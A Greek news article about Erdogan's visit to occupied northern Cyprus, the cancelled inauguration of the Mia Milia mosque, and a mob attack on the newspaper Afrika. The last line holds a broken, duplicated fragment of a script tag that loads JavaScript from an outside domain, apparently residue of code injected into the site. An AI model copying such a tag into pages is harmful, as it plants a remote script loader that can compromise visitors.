Ακυρώθηκαν τα εγκαίνια τζαμιού από τον Ερντογάν στα κατεχόμενα

Κατ’ ιδίαν συνάντηση με τον Τουρκοκύπριο ηγέτη Μουσταφά Ακιντζί είχε ο Ταγίπ Ερντογάν, που πραγματοποίησε την καθιερωμένη επίσκεψη στην κατεχόμενη Κύπρο από Τούρκους προέδρους μετά την ανάληψη των καθηκόντων τους.

Στις διευρυμένες συνομιλίες για το Κυπριακό μεταξύ των δύο ανδρών παρόντες ήταν ηγέτες των τεσσάρων κομμάτων που μετέχουν στη «κυβέρνηση» στα κατεχόμενα.

Το γεγονός ότι έφτασε προερχόμενος από το Αζερμπαϊτζάν, όπου είχε μεταβεί για την πρώτη του επίσκεψη στο εξωτερικό, σχολιάστηκε και διατυπώθηκαν εικασίες ότι ενδεχομένως ο ίδιος να είναι δυσαρεστημένος από τις διαμαρτυρίες των προηγούμενων ημερών.

Επίσης, ο Τούρκος πρόεδρος δεν εγκαινίασε, όπως ήταν προγραμματισμένο, το τεράστιο τέμενος στη Μια Μηλιά έξω από τη Λευκωσία συνολικού εμβαδού 37.000 τετραγωνικών μέτρων, που μπορεί να δεχθεί 6.000 πιστούς για προσευχή.

Ο λόγος για την ακύρωση των εγκαινίων του τεμένους από τον Ερντογάν δεν έχει γίνει γνωστός. Σημειώνεται ότι στους δρόμους από τους οποίους πέρασε ο Ερντογαν πάρθηκαν δρακόντεια μέτρα ασφάλειας με εκατοντάδες αστυνομικούς και στρατιώτες να φρουρούν κάθε σημείο.

Υποστηρικτές του κρατούσαν σημαίες της Τουρκίας, «σημαίες» της λεγόμενης «ΤΔΒΚ», τα εμβλήματα του κόμματος ΑΚΡ και φωτογραφίες του.

Επίθεση σε αριστερή τουρκοκυπριακή εφημερίδα

Χθες ο Σενέρ Λεβέντ, αρχισυντάκτης της αριστερής τουρκοκυπριακής εφημερίδας Αφρίκα, κατηγόρησε τον πρόεδρο της Τουρκίας για υποκίνηση της επίθεση υποστηρικτών του στα γραφεία του μέσου, που είχε επικρίνει τη στρατιωτική επίθεση της Άγκυρας στη Συρία.

Δεκάδες άνθρωποι με τουρκικές σημαίες έσπασαν τα παράθυρα, έριξαν πέτρες, αυγά και άλλα αντικείμενα, ανέφερε άλλος δημοσιογράφος, ο οποίος πρόσθεσε ότι μερικοί προσπάθησαν να μπουν στο γραφείο του πρώτου ορόφου.

Ο Λεβέντ τόνισε ότι δεν πρόκειται να σιωπήσει η εφημερίδα, που στο φύλλο της Κυριακής είχε αναφερθεί στην στρατιωτική κατοχή της Βόρειας Κύπρου μετά την εισβολή στο νησί το 1974 έπειτα από το πραξικόπημα στην Ελλάδα.

«Ο Ερντογάν έστειλε τους διαδηλωτές, ήταν μια απειλή εναντίον μας», δήλωσε στο Associated Press. «Θα συνεχίσουμε να λέμε την αλήθεια και η εφημερίδα θα κυκλοφορήσει αύριο» πρόσθεσε.

Σύμφωνα με την ιστοσελίδα της τουρκικής προεδρίας, ο Ερντογάν χαρακτήρισε την Αφρίκα «φτηνή» εφημερίδα και κάλεσε τους Τουρκοκύπριους να «δώσουν την απαραίτητη απάντηση σε αυτό».

Η κυβέρνηση της Κύπρου κατήγγειλε το περιστατικό προαναγγέλλοντας ότι θα ζητήσει από τα Ηνωμένα Έθνη και τα ευρωπαϊκά θεσμικά όργανα να λάβουν μέτρα για την προστασία του ελεύθερου Τύπου και της ελευθερίας του λόγου.

Η Ένωση Δημοσιογράφων της Κύπρου καταδίκασε το φαινόμενο βίας σημειώνεοντας πως οι δημοσιογράφοι δεν είναι «υπηρέτες στην εξουσία ανεξάρτητα από το πόσο ισχυρή ή απόλυτη είναι».

___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>